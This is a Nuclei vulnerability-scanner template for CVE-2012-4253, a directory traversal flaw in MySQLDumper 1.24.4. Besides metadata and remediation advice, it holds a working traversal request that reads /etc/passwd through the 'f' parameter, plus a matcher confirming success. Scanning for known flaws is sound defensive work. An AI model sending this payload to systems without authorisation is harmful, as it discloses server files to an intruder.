nuclei-templates/http/cves/2012/CVE-2012-4253.yaml

46 lines
2.0 KiB
YAML

id: CVE-2012-4253
info:
name: MySQLDumper 1.24.4 - Directory Traversal
author: daffainfo
severity: medium
description: Multiple directory traversal vulnerabilities in MySQLDumper 1.24.4 allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) language parameter to learn/cubemail/install.php or (2) f parameter learn/cubemail/filemanagement.php, or execute arbitrary local files via a .. (dot dot) in the (3) config parameter to learn/cubemail/menu.php.
impact: |
An attacker can read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
remediation: |
Upgrade to a patched version of MySQLDumper or apply the necessary security patches to fix the directory traversal vulnerability.
reference:
- https://www.exploit-db.com/exploits/37129
- https://nvd.nist.gov/vuln/detail/CVE-2012-4253
- http://packetstormsecurity.org/files/112304/MySQLDumper-1.24.4-LFI-XSS-CSRF-Code-Execution-Traversal.html
- https://exchange.xforce.ibmcloud.com/vulnerabilities/75286
- https://exchange.xforce.ibmcloud.com/vulnerabilities/75283
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:N/A:N
cvss-score: 4.3
cve-id: CVE-2012-4253
cwe-id: CWE-22
epss-score: 0.0179
epss-percentile: 0.87805
cpe: cpe:2.3:a:mysqldumper:mysqldumper:1.24.4:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: mysqldumper
product: mysqldumper
tags: cve2012,cve,packetstorm,lfi,edb,mysqldumper,xss
http:
- method: GET
path:
- "{{BaseURL}}/learn/cubemail/filemanagement.php?action=dl&f=../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# digest: 490a00463044022034f990a5bff340326f593c8b149d2c1411d20ed9cf0844eb64585b1dbdc6f1e202204f319f36ce4f7c1b596ec339117b0cb8b258df92388a6d342faa644f81bc658f:922c64590222798bb761d5b6d8e72950